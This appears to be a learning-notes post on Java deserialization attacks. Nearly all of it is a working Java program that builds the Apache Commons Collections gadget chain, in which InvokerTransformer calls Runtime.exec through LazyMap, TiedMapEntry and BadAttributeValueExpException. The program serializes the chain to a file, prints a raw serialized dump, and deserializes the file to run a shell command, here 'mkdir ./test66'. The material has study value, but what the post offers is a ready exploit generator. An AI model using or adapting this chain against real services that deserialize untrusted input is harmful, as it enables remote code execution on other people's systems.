java 反序列化漏洞 攻击利用链

参考原文

  https://f5.pm/go-45329.html

exec.java

        package safe;
        
        
        import org.apache.commons.collections.Transformer;
        import org.apache.commons.collections.functors.ChainedTransformer;
        import org.apache.commons.collections.functors.ConstantTransformer;
        import org.apache.commons.collections.functors.InvokerTransformer;
        import org.apache.commons.collections.keyvalue.TiedMapEntry;
        import org.apache.commons.collections.map.LazyMap;
        
        import javax.management.BadAttributeValueExpException;
        import java.io.*;
        import java.lang.reflect.Field;
        import java.util.HashMap;
        import java.util.Map;
        
        public class Exec  {
        
            private static BadAttributeValueExpException getObject(final String command) throws Exception {
                final String[] execArgs = new String[] { command };
                // inert chain for setup
                final Transformer transformerChain = new ChainedTransformer(
                        new Transformer[]{ new ConstantTransformer(1) });
                // real chain for after setup
                final Transformer[] transformers = new Transformer[] {
                        new ConstantTransformer(Runtime.class),
                        new InvokerTransformer("getMethod", new Class[] {
                                String.class, Class[].class }, new Object[] {
                                "getRuntime", new Class[0] }),
                        new InvokerTransformer("invoke", new Class[] {
                                Object.class, Object[].class }, new Object[] {
                                null, new Object[0] }),
                        new InvokerTransformer("exec",
                                new Class[] { String.class }, execArgs),
                        new ConstantTransformer(1) };
        
                final Map innerMap = new HashMap();
        
                final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
        
                TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
        
                BadAttributeValueExpException val = new BadAttributeValueExpException(null);
                Field valfield = val.getClass().getDeclaredField("val");
                valfield.setAccessible(true);
                valfield.set(val, entry);
                Class aClass = transformerChain.getClass();
        
                Field iTransformers = aClass.getDeclaredField("iTransformers");
                iTransformers.setAccessible(true);
                iTransformers.set(transformerChain,transformers);
        
                return val;
            }
        
            public static void main(String[] args) throws Exception {
                String filePath="/Users/c/IdeaProjects/learnSpace/learn/a.txt";
                testInvokerTransformer();
        
                BadAttributeValueExpException calc = getObject("mkdir ./test66");
        
                ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();//用于存放person对象序列化byte数组的输出流
        
                ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
                objectOutputStream.writeObject(calc);//序列化对象
                objectOutputStream.flush();
        
                objectOutputStream.close();
        
                byte[] bytes1 = byteArrayOutputStream.toByteArray(); //读取序列化后的对象byte数
                fileWrite(bytes1,filePath);
                System.out.println(new String(bytes1));
        //
        //        String ss="detailMessaget\u0000\u0012Ljava/lang/String;[\u0000\n" +
        //                "stackTracet\u0000\u001E[Ljava/lang/StackTraceElement;L\u0000\u0014suppressedExceptionst\u0000\u0010Ljava/util/List;xpq\u0000~pur\u0000\u001E[Ljava.lang.StackTraceElement;\u0002F*<<�\"9\u0002\u0000\u0000xp\u0000\u0000\u0000\u0002sr\u0000\u001Bjava.lang.StackTraceElementa\tŚ&6݅\u0002\u0000\u0004I\u0000\n" +
        //                "lineNumberL\u0000\u000EdeclaringClassq\u0000~\u0000\u0005LfileNameq\u0000~\u0000\u0005L\u0000\n" +
        //                "iTransformerst\u0000-[Lorg/apache/commons/collections/Transformer;xpur\u0000-[Lorg.apache.commons.collections.Transformer;�V*��4\u0018�\u0002\u0000\u0000xp\u0000\u0000\u0000\u0005sr\u0000;org.apache.commons.collections.functors.ConstantTransformerXv�\u0011A\u0002��\u0002\u0000\u0001L\u0000\tiConstantq\u0000~\u0000\u0001xpvr\u0000\u0011java.lang.Runtime\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000xpsr\u0000:org.apache.commons.collections.functors.InvokerTransformer���k{|�8\u0002\u0000\u0003[\u0000\u0005iArgst\u0000\u0013[Ljava/lang/Object;L\u0000\u000BiMethodNameq\u0000~\u0000\u0005[\u0000\u000BiParamTypest\u0000\u0012[Ljava/lang/Class;xpur\u0000\u0013[Ljava.lang.Object;��X�\u0010s)l\u0002\u0000\u0000xp\u0000\u0000\u0000\u0002t\u0000\n" +
        //                "getRuntimeur\u0000\u0012[Ljava.lang.Class;�\u0016\u05EE��Z�\u0002\u0000\u0000xp\u0000\u0000\u0000\u0000t\u0000\tgetMethoduq\u0000~\u0000/\u0000\u0000\u0000\u0002vr\u0000\u0010java.lang.String��8z;�B\u0002\u0000\u0000xpvq\u0000~\u0000/sq\u0000~\u0000(uq\u0000~\u0000,\u0000\u0000\u0000\u0002puq\u0000~\u0000,\u0000\u0000\u0000\u0000t\u0000\u0006invokeuq\u0000~\u0000/\u0000\u0000\u0000\u0002vr\u0000\u0010java.lang.Object\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000xpvq\u0000~\u0000,sq\u0000~\u0000(ur\u0000\u0013[Ljava.lang.String;��V��\u001D{G\u0002\u0000\u0000xp\u0000\u0000\u0000\u0001t\u0000\u000Emkdir ./test66t\u0000\u0004execuq\u0000~\u0000/\u0000\u0000\u0000\u0001q\u0000~\u00004sq\u0000~\u0000$sr\u0000\u0011java.lang.Integer\u0012⠤���8\u0002\u0000\u0001I\u0000\u0005valuexr\u0000\u0010java.lang.Number���\u001D\u000B���\u0002\u0000\u0000xp\u0000\u0000\u0000\u0001sr\u0000\u0011java.util.HashMap\u0005\u0007���\u0016`�\u0003\u0000\u0002F\u0000\n" +
        //                "loadFactorI\u0000\tthresholdxp?@\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0010\u0000\u0000\u0000\u0000xx";
        ////        byte[] bytes=ss.getBytes("UTF-8");
                byte[] bytes=fileRead();
                Runtime.getRuntime().exec("rm -rf ./test66");
                ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);//存放byte数组的输入流
        
                ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
                Object o = objectInputStream.readObject(); //将byte数组输入流反序列化
                System.out.println();
        
            }
        
        
            private static void testInvokerTransformer(){
                InvokerTransformer t1=new InvokerTransformer("exec",new Class[]{ String.class},new Object[]{"mkdir ./test"});
        
                t1.transform(Runtime.getRuntime());
            }
        
        
            private static byte[] fileRead(){
                File file = new File("/Users/c/IdeaProjects/learnSpace/learn/a.txt");
                FileInputStream fileInputStream = null;
                byte[] bFile = new byte[(int) file.length()];
                try {
                    fileInputStream = new FileInputStream(file);
                    fileInputStream.read(bFile);
                    fileInputStream.close();
                } catch (Exception e) {
                    e.printStackTrace();
                }
                return bFile;
            }
            private static void fileWrite(byte[] bytes,String path){
        
                FileOutputStream fileOutputStream = null;
                try {
                    fileOutputStream = new FileOutputStream(path);
                    fileOutputStream.write(bytes);
                    fileOutputStream.close();
                } catch (Exception e) {
                    e.printStackTrace();
                }
        
            }
        
        
        }